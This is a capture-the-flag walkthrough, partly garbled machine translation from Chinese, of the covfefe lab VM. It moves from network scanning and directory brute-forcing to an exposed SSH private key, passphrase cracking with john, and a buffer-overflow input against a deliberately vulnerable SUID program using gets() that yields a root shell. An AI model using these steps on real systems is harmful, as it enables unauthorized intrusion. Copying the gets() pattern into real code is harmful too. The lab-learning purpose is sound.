**
First, the detection range address
Pay attention to attack aircraft before the probe network connection mode is bridging mode. The reason for choosing the virtual machine on the network mode.
**
root@kali:~# netdiscover -r 192.168.1.1/24
Here to explain:
- Netdiscover is an active / passive ARP investigative tool. This tool is invaluable in not using DHCP in wireless networks. Use Netdiscover tool scans IP address on the network, ARP investigative tool Netdiscover check online host or an ARP request sent by the search for them. Used to host LAN discovery.
2.DHCP (Dynamic Host Configuration Protocol, Dynamic Host Configuration Protocol) is commonly used in large local area network environment, the main role is to centralize the management, assign an IP address, the host to dynamic network environments to obtain an IP address, Gateway address , DNS server address and other information, and be able to enhance the utilization of addresses.
DHCP adopts a client / server model, a host address dynamically assigned tasks driven by a network host. When the DHCP server receives the application information from the network host address, the address will be sent to the relevant configuration information to the network host, to achieve a dynamic allocation of network host address information.
**
Second, the communication test host range of
**
root@kali:~# ping
China Unicom has more than proved that between two machines, then we carry out experiments.
**
Third, the port scan
**
root@kali:~# nmap -sV 192.168.1.107
root@kali:~# nmap -sV 192.168.1.107
扫描结果:
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-04 21:37 CST
Nmap scan report for 192.168.1.107
Host is up (0.00013s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
80/tcp open http nginx 1.10.3
31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3)
MAC Address: 08:00:27:50:7F:AC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds
**
Fourth, the analysis of detection results
**
http://192.168.1.107:31337/
View Page Source, no access to information.
**
V. detect hidden files
**
root@kali:~# dirb http://192.168.1.107:31337/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Jul 5 17:25:10 2019
URL_BASE: http://192.168.1.107:31337/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.107:31337/ ----
+ http://192.168.1.107:31337/.bash_history (CODE:200|SIZE:19)
+ http://192.168.1.107:31337/.bashrc (CODE:200|SIZE:3526)
+ http://192.168.1.107:31337/.profile (CODE:200|SIZE:675)
+ http://192.168.1.107:31337/.ssh (CODE:200|SIZE:43)
+ http://192.168.1.107:31337/robots.txt (CODE:200|SIZE:70)
-----------------
END_TIME: Fri Jul 5 17:25:24 2019
DOWNLOADED: 4612 - FOUND: 5
You can see five search results.
First we open sensitive files (robot.txt):
User-agent: *
Disallow: /.bashrc
Disallow: /.profile
Disallow: /taxes
Open sensitive documents, obtained flag value:
found in the private, public key file. Here we do not need to download the public, because the public key is present on the server.
**
Sixth, landing ssh
**
root@kali:~# cd 桌面/
root@kali:~/桌面# ls -alh
总用量 16K
drwxr-xr-x 2 root root 4.0K 7月 5 17:32 .
drwxr-xr-x 29 root root 4.0K 7月 5 17:32 ..
-r-------- 1 root root 395 7月 5 17:32 authorized_keys
-r-------- 1 root root 1.8K 7月 5 17:31 id_rsa
root@kali:~/桌面# chmod 777 id_rsa
root@kali:~/桌面#
文件名赋权限,用私钥登陆ssh服务。
Once you have the private key, we also need to login Password:
root@kali:~/桌面# ssh -i id_rsa [email protected]
The authenticity of host '192.168.1.107 (192.168.1.107)' can't be established.
ECDSA key fingerprint is SHA256:5Tmg/FD7Iga/sFY/1z4etq44S8/bmokfg3R3VyjHtVM.
Are you sure you want to continue connecting (yes/no)? y
Please type 'yes' or 'no': yes
Warning: Permanently added '192.168.1.107' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Crack ssh private key:
root@kali:~/桌面# ssh2john id_rsa >tsacrack //转化为john可识别信息。
root@kali:~/桌面# ls -al
总用量 20
drwxr-xr-x 2 root root 4096 7月 5 17:44 .
drwxr-xr-x 29 root root 4096 7月 5 17:32 ..
-r-------- 1 root root 395 7月 5 17:32 authorized_keys
-rw------- 1 root root 1766 7月 5 17:31 id_rsa
-rw-r--r-- 1 root root 3553 7月 5 17:46 tsacrack //转化完毕
root@kali:~/桌面# zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules tsacrack //进行解密
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
starwars (id_rsa ) //解密结果
1g 0:00:00:00 9.090g/s 6081p/s 6081c/s 6081C/s starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/桌面# ssh -i id_rsa [email protected] //登陆ssh
Enter passphrase for key 'id_rsa':
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
simon@covfefe:~$
simon@covfefe:~$ pwd //pwd命令pwd是Print Working Directory的缩写,其功能是显示当前所在工作目录的全路径。主要用在当不确定当前所在位置时,通过pwd来查看当前目录的绝对路径。
/home/simon
simon@covfefe:~$ ls
http_server.py robots.txt
simon@covfefe:~$ cd /root // /root 目录是root用户在别的用户上创建的目录,别的用户不具有root权限无法访问/
simon@covfefe:/root$ ls
flag.txt read_message.c
simon@covfefe:/root$ cat flag.txt
cat: flag.txt: Permission denied
simon@covfefe:/root$ find / -perm -4000 2>/dev/null //找具有root执行权限的文件
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/read_message //此文件跟root下的read_message.c类似,我们查看一下。
/bin/umount
/bin/su
/bin/mount
/bin/ping
simon@covfefe:/root$ cat read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// You're getting close! Here's another flag:
// flag2{use_the_source_luke}
int main(int argc, char *argv[]) {
char program[] = "/usr/local/sbin/message";
char buf[20]; //根据缓冲区溢出。
char authorized[] = "Simon";
printf("What is your name?\n");
gets(buf);
// Only compare first five chars to save precious cycles:
if (!strncmp(authorized, buf, 5)) {
printf("Hello %s! Here is your message:\n\n", buf);
// This is safe as the user can't mess with the binary location:
execve(program, NULL, NULL);
} else {
printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
exit(EXIT_FAILURE);
}
}
simon@covfefe:/root$ read_message
What is your name?
simonAAAAAAAAAAAAAAA/bin/sh
Sorry simonAAAAAAAAAAAAAAA/bin/sh, you're not Simon! The Internet Police have been informed of this violation.
simon@covfefe:/root$ read_message
What is your name?
SimonAAAAAAAAAAAAAAA/bin/sh
Hello SimonAAAAAAAAAAAAAAA/bin/sh! Here is your message:
# pwd //进入root目录下。
/root
# cat flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
#
summary:
netdiscover -r 192.168.1.1/24 //扫描局域网内存活的主机
ping 192.168.1.107 //测试连通性
dirb http://192.68.1.107:31337//查看隐藏目录
ssh -i 私钥 用户名@ip地址 //登陆ssh
ssh2john 私钥文件 > isacrack //将私钥文件转化为john可识别文件。
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules tsacrack //进行解密
第一个文件是kali自带的字典。
pwd //查看当前路径
find / -perm -4000 2>/dev/null
or
find /home -user root -ls
linux in / dev / null command
Prohibition standard error
[root@zhoucentos log]# rm filename1
rm: 无法删除"filename1": 没有那个文件或目录
[root@zhoucentos log]# rm filename1 2>/dev/null